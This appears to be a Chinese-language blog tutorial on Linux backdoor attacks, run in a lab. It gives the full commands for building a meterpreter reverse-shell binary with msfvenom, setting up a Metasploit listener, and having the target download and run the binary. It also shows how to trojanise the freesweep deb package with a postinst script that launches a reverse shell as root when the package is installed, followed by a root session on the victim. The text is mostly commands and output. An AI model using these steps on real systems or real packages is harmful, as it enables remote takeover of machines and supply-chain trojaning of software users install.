1.1 后门攻击实例
1.1.1 制作Linux后门获取shell
1.1.1.1 制作Linux木马
# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor
1.1.1.2 kali启动监听程序
msf6 > use exploit/multi/handler [*] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.10.180 LHOST => 192.168.10.180 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > run
1.1.1.3 Linux(centos)执行木马
[root@test ~]# wget http://192.168.10.180/backdoor [root@test ~]# chmod +x backdoor [root@test ~]# nohup ./backdoor &
1.1.1.4 后门连接成功后执行攻击指令
meterpreter > getuid Server username: root meterpreter > sysinfo Computer : 192.168.10.80 OS : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ls Listing: /root ============== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100600/rw------- 13893 fil 2022-06-01 16:01:33 +0800 .bash_history 100644/rw-r--r-- 18 fil 2013-12-29 10:26:31 +0800 .bash_logout 100644/rw-r--r-- 176 fil 2013-12-29 10:26:31 +0800 .bash_profile 100644/rw-r--r-- 176 fil 2013-12-29 10:26:31 +0800 .bashrc 100644/rw-r--r-- 100 fil 2013-12-29 10:26:31 +0800 .cshrc 040755/rwxr-xr-x 37 dir 2021-12-14 10:44:29 +0800 .java 100600/rw------- 349 fil 2021-12-17 14:11:10 +0800 .mysql_history 040740/rwxr----- 19 dir 2021-11-16 10:41:42 +0800 .pki 040700/rwx------ 25 dir 2021-12-14 13:23:17 +0800 .ssh 100644/rw-r--r-- 129 fil 2013-12-29 10:26:31 +0800 .tcshrc 100600/rw------- 6982 fil 2022-05-12 10:36:28 +0800 .viminfo 100600/rw------- 1434 fil 2021-05-21 14:07:28 +0800 anaconda-ks.cfg 100755/rwxr-xr-x 295 fil 2022-06-07 17:05:55 +0800 backdoor 100644/rw-r--r-- 27647 fil 2022-06-01 10:47:00 +0800 dnmap-0.6.zip 040755/rwxr-xr-x 199 dir 2022-06-01 15:02:43 +0800 dnmap-master 100644/rw-r--r-- 23761 fil 2022-01-13 13:28:05 +0800 history.log
1.1.2 给deb软件注入后门进行攻击
1.1.2.1 制作恶意deb软件包
- 下载解压deb软件
# apt install freesweep --download-only # mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ./ # dpkg -x freesweep_1.0.2-1_amd64.deb free
- 生成后门文件
# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_sources
- 创建打包deb的配置文件
# mkdir -p /root/free/DEBIAN # cd /root/free/DEBIAN # cat >> /root/free/DEBIAN/control <<'EOF' Package: freesweep Version: 1.0.1-1 Section: Games and Amusement Priority: optional Architecture: amd64 Maintainer: Ubuntu MOTU Developers ([email protected]) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text- based terminals currently in use. EOF # cat >> /root/free/DEBIAN/postinst <<'EOF' #!/bin/bash sudo chmod 2755 /usr/games/freesweep_sources sudo /usr/games/freesweep_sources & EOF # chmod 755 /root/free/DEBIAN/postinst
- 重新打包deb文件
# dpkg-deb --build /root/free/ # ll -h free.deb -rw-r--r-- 1 root root 55K Jun 8 08:54 free.deb # 若报错:dpkg-deb: file `free.deb' contains ununderstood data member control.tar.xz , giving up # 则使用此命令打包:dpkg-deb -Z gzip --build ./free free.deb # mv free.deb /var/www/html # systemctl start apache2.service
1.1.2.2 开启msf监听
# msfconsole msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp payload => linux/x64/shell/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.10.180 LHOST => 192.168.10.180 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > exploit –j
1.1.2.3 客户端安装deb
msfadmin@metasploitable:~$ wget http://192.168.10.180/free.deb msfadmin@metasploitable:~$ sudo dpkg -i free.deb
1.1.2.4 查看连接情况并获取服务器信息
msf6 exploit(multi/handler) > sessions

msf6 exploit(multi/handler) > sessions -i 5 id uid=0(root) gid=0(root) groups=0(root) pwd / background Background session 5? [y/N] y

我的微信
如果有技术上的问题可以扫一扫我的微信